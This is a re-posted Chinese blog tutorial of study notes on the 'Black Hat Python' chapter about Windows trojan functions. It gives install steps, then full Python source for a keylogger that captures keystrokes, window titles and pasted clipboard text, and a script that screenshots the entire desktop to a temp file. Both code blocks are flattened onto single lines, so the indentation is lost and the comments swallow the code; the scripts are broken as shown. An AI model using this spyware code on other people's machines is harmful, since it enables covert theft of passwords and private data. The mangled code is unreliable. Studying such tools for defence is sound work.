Python黑帽子 黑客與滲透測試編程之道(十) 第八

  網絡滲透測試     |      2023-03-26 02:01

互聯網集市收集整理的這篇技術教程文章主要介紹了Python黑帽子 黑客與滲透測試編程之道(十) 第八章:Windows下木馬的常用功能,小編現在分享給大家,供廣大互聯網技能從業者學習和參考。文章包含4008字,純文字閱讀大概需要6分鐘。

有趣的鍵盤記錄

首先安裝兩個包 pythoncom 和 pyHook

安裝這兩個包,一定要注意版本問題?。?!折騰了好久
2.7 32位的Python可以用這個教程
https://blog.csdn.net/xiaoliu5396/article/details/46457585
當時裝這個的時候有以下錯誤:Python version 2.7 required,which was not found in the registry。
解決辦法:
https://blog.csdn.net/zklth/article/details/8117207

2.7 64位的Python借鑒的是這個教程
https://www.cnblogs.com/helloworldcc/p/9427452.html

我的做法:
1)把pip更新到最新
python -m pip install –upgrade pip (好像可以省略)

2)下載64位的pywin32 https://pypi.org/project/pywin32/#files

將它放入Python安裝路徑的Scripts文件夾下。

3)下載64位的pyHook https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook

最好搜索win+f搜索一下,不然很難找。。。
將它放入Python安裝路徑的Scripts文件夾下。

4)安裝pywin32和pyHook
到安裝Python的Scripts文件夾下運行:
pip.exe install pywin32-224-cp27-cp27m-win_amd64.whl
pip.exe install pyHook-1.5.1-cp27-cp27m-win_amd64.whl

此時前提工作搞定:

———————————————————————————————————————

代碼:

from ctypes import * import pythoncom import pyHook import win32clipboard user32 = windll.user32 kernel32 = windll.kernel32 psapi = windll.psapi current_window = None def get_current_process(): # get a handle to the foreground window hwnd = user32.GetForegroundWindow() # find the process ID pid = c_ulong(0) user32.GetWindowThreadProcessId(hwnd, byref(pid)) # store the current process ID process_id = "%d" % pid.value # grab the executable executable = create_string_buffer("\x00" * 512) h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid) psapi.GetModuleBaseNameA(h_process,None,byref(executable),512) # now read it's title window_title = create_string_buffer("\x00" * 512) length = user32.GetWindowTextA(hwnd, byref(window_title),512) # print out the header if we're in the right process print print "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value) print # close handles kernel32.CloseHandle(hwnd) kernel32.CloseHandle(h_process) def KeyStroke(event): global current_window # check to see if target changed windows if event.WindowName != current_window: current_window = event.WindowName get_current_process() # if they pressed a standard key if event.Ascii > 32 and event.Ascii < 127: print chr(event.Ascii), else: # if [Ctrl-V], get the value on the clipboard # added by Dan Frisch 2014 if event.Key == "V": win32clipboard.OpenClipboard() pasted_value = win32clipboard.GetClipboardData() win32clipboard.CloseClipboard() print "[PASTE] - %s" % (pasted_value), else: print "[%s]" % event.Key, # pass execution to next hook registered return True # create and register a hook manager kl = pyHook.HookManager() kl.KeyDown = KeyStroke # register the hook and execute forever kl.HookKeyboard() pythoncom.PumpMessages()

測試:
運行代碼之后,另外打開一個cmd窗口,輸入test,會看到所輸入的字符會出現在第一個窗口。

試著瀏覽網站:

截取屏幕快照

代碼:

import win32gui import win32ui import win32con import win32api # grab a handle to the main desktop window hdesktop = win32gui.GetDesktopWindow() # determine the size of all monitors in pixels width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN) height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN) left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN) top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN) # create a device context desktop_dc = win32gui.GetWindowDC(hdesktop) img_dc = win32ui.CreateDCFromHandle(desktop_dc) # create a memory based device context mem_dc = img_dc.CreateCompatibleDC() # create a bitmap object screenshot = win32ui.CreateBitmap() screenshot.CreateCompatibleBitmap(img_dc, width, height) mem_dc.SelectObject(screenshot) # copy the screen into our memory device context mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY) # save the bitmap to a file screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp') # free our objects mem_dc.DeleteDC() win32gui.DeleteObject(screenshot.GetHandle())

結果:
截出來的圖:

以上是互聯網集市為您收集整理的Python黑帽子 黑客與滲透測試編程之道(十) 第八章:Windows下木馬的常用功能全部內容,希望文章能夠幫你解決Python黑帽子 黑客與滲透測試編程之道(十) 第八章:Windows下木馬的常用功能所遇到的程序開發問題。 如果覺得互聯網集市技術教程內容還不錯,歡迎將互聯網集市網站推薦給程序員好友。